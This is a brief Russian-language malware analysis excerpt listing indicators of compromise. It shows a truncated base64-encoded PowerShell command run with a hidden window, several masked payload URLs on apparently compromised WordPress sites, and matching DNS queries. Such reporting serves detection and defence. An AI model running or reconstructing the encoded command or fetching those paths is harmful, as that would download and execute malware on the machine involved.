Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABsAHMAZAAxAEwANABOAD0AJwByAFIAXwBNAFoAOQBXACcAOwAkAHEATwB1AEcANQBSACAAPQAgACcAMgA2ADMAJwA7ACQAQgAwAEcAOQBEAGQAbAA9ACcAUgBXAG4ANQBRAHcAJwA7ACQARAB1AEwAYgBpADAAYwBrAD0AJABlAG4AdgA6AHUAc...
- http://ai###anandi.com/wp-admin/bwk5ck874/
- http://gi###night.com/wp-content/vr12/
- http://el######yproductions.com/wp-includes/gq4309/
- http://sk###ious.com/wp-includes/1s48uw99725/
- http://pi####2.crooze.com/wp-content/d84/
- DNS ASK ai###anandi.com
- DNS ASK gi###night.com
- DNS ASK el######yproductions.com
- DNS ASK sk###ious.com
- DNS ASK pi####2.crooze.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABsAHMAZAAxAEwANABOAD0AJwByAFIAXwBNAFoAOQBXACcAOwAkAHEATwB1AEcANQBSACAAPQAgACcAMgA2ADMAJwA7ACQAQgAwAEcAOQBEAGQAbAA9ACcAUgBXAG4ANQBRAHcAJwA7ACQARAB1AEwAYgBpADAAYwBrAD0AJABlAG4AdgA6AHUAc...' (со скрытым окном)